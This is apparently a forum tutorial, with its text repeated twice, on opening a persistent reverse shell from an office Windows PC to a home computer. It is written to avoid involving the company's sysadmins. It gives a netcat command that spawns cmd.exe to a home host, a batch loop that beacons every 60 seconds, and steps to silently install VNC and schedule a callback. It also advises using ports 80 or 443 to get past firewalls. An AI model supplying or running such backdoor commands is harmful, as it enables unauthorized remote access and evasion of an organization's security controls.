Intro
This tutorial has been inspired by "How to build a low cost Linux Home Server", Published by superczar, 30 Nov 07. I have already been doing what he prescribed in the article, but I wanted to do more, in this case do reverse connections, i.e. connecting to my office computer from home, without having to bother the "friendly" sysadmins. I am not sure about the common practical usage but I like leaving office on time and prolly go home and work in comfort. So here it goes.
I essentially use the swiss army knife of network utilities, the Netcat. I have been facinated by this one with abilities to pipe anything to the network, get anything from the network in numerous combinations. This also requires one to be able to access the world from the office computer, i.e. at the very minimum port 80 (which usually is). If more are open, the better it is.
The basic lies in netcat's ability to spawn a process when a connection is established. Having used this property a lot of times when nc is used as server, people don't really think it can be exploited even when nc is used as a client. The option "-e" is not available in the default builds available, luckily the winnt mod present on the nc site has this and my office comp happens to be a windows xp box.
Step 1 Configure home comp
1. Get an account with DynDNS and register a subdomain. Cost: Nothing
2. Set up the home comp to update the DynDNS record, either automatically (using misc utils available on the net) or set up the modem to update this record everytime it comes up (atleast my beetel 220 BX has this option)
3. Configure the modem to fwd the chosen port to the home pc. I'd call this port PORT XXX.
4. Ensure there is nobody listening on port XXX on the home comp.
Step 2 Office computer
We have to arrange the office computer to call home now. This is arranged by
1. Download and unzip nt netcat version from (http://www.vulnwatch.org/netcat/).
2. Run it call home DNS and port XXX as
What this means is that nc would call pluto.home.net at port XXX and when the connection is established, it spawns cmd.exe and transparently redirects stdin/stdout till connection is terminated.
3. Ideally i'd set this up in a batch script to call home every 60 seconds. A ready made script is
The script tries to establish a connection. If nc times out, it pings local machine for 60 packets and then go backs to the START. The ping trick is cos I could not find sleep.exe from Windows Resource kit
Step 3 Home comp receives the call
Now we have make the home comp receive the call. Download the appropriate version of Netcat for your home comp OS. Mine is XP so I stuck with NT netcat.
As soon as netcat starts listening, and the script is at the correct cycle of trying to connect home, a connection would be established and you'd get the command prompt. If it doesn't connect immediately, wait for the ping sleep cycle to come around.
Now that you have the prompt, the box is yours and you know what to do
Taking it forward:
1. Once I had the prompt,
a. I used wget to download the latest version of tightvnc and installed it silently (i already had wget on my office machine).
b. I opened port 5500 on my modem to fwd it to my home comp and placed the vncviewer in listening mode on my home comp.
c. I created a batch file using "echo" to make winvnc connect to my home IP.
d. I scheduled this batch file using "at" command to a couple of minutes after "time /t". And then patiently waited for my office comp to call home.
e. It did and now i have the office comp desktop
Here my office allowed connections to 5500 to go out. In case yours doesn't choose a port which is allowed. Most common ports allowed are 80 (HTTP), 443 (HTTPS). Unless, your company is very very crazy about security, i.e. checks the packet type on the ports as well, I think you should be able to get out, just configure the ports appropriately for nc/vnc/whatever .....
There are a lot of improvements that can be made to this, but I wanted to make it work as a proof of concept. Any inputs/criticisms are welcome.
There may be readymade/better ways to make it work. I would be glad to hear about those, but this one helped my scratch the itch that comes back once in a while
Adios
This tutorial has been inspired by "How to build a low cost Linux Home Server", Published by superczar, 30 Nov 07. I have already been doing what he prescribed in the article, but I wanted to do more, in this case do reverse connections, i.e. connecting to my office computer from home, without having to bother the "friendly" sysadmins. I am not sure about the common practical usage but I like leaving office on time and prolly go home and work in comfort. So here it goes.
I essentially use the swiss army knife of network utilities, the Netcat. I have been facinated by this one with abilities to pipe anything to the network, get anything from the network in numerous combinations. This also requires one to be able to access the world from the office computer, i.e. at the very minimum port 80 (which usually is). If more are open, the better it is.
The basic lies in netcat's ability to spawn a process when a connection is established. Having used this property a lot of times when nc is used as server, people don't really think it can be exploited even when nc is used as a client. The option "-e" is not available in the default builds available, luckily the winnt mod present on the nc site has this and my office comp happens to be a windows xp box.
Step 1 Configure home comp
1. Get an account with DynDNS and register a subdomain. Cost: Nothing
2. Set up the home comp to update the DynDNS record, either automatically (using misc utils available on the net) or set up the modem to update this record everytime it comes up (atleast my beetel 220 BX has this option)
3. Configure the modem to fwd the chosen port to the home pc. I'd call this port PORT XXX.
4. Ensure there is nobody listening on port XXX on the home comp.
Step 2 Office computer
We have to arrange the office computer to call home now. This is arranged by
1. Download and unzip nt netcat version from (http://www.vulnwatch.org/netcat/).
2. Run it call home DNS and port XXX as
Code:
nc pluto.home.net XXX -e cmd.exeWhat this means is that nc would call pluto.home.net at port XXX and when the connection is established, it spawns cmd.exe and transparently redirects stdin/stdout till connection is terminated.
3. Ideally i'd set this up in a batch script to call home every 60 seconds. A ready made script is
Code:
---------------
@echo off
:START
C:\temp\nc.exe pluto.home.net XXX -e cmd.exe
@ping 127.0.0.1 -n 60 -w 1000 > nul
goto START
--------------------The script tries to establish a connection. If nc times out, it pings local machine for 60 packets and then go backs to the START. The ping trick is cos I could not find sleep.exe from Windows Resource kit
Step 3 Home comp receives the call
Now we have make the home comp receive the call. Download the appropriate version of Netcat for your home comp OS. Mine is XP so I stuck with NT netcat.
Code:
nc -l -p XXXAs soon as netcat starts listening, and the script is at the correct cycle of trying to connect home, a connection would be established and you'd get the command prompt. If it doesn't connect immediately, wait for the ping sleep cycle to come around.
Now that you have the prompt, the box is yours and you know what to do
Taking it forward:
1. Once I had the prompt,
a. I used wget to download the latest version of tightvnc and installed it silently (i already had wget on my office machine).
b. I opened port 5500 on my modem to fwd it to my home comp and placed the vncviewer in listening mode on my home comp.
c. I created a batch file using "echo" to make winvnc connect to my home IP.
d. I scheduled this batch file using "at" command to a couple of minutes after "time /t". And then patiently waited for my office comp to call home.
e. It did and now i have the office comp desktop
Here my office allowed connections to 5500 to go out. In case yours doesn't choose a port which is allowed. Most common ports allowed are 80 (HTTP), 443 (HTTPS). Unless, your company is very very crazy about security, i.e. checks the packet type on the ports as well, I think you should be able to get out, just configure the ports appropriately for nc/vnc/whatever .....
There are a lot of improvements that can be made to this, but I wanted to make it work as a proof of concept. Any inputs/criticisms are welcome.
There may be readymade/better ways to make it work. I would be glad to hear about those, but this one helped my scratch the itch that comes back once in a while
Adios
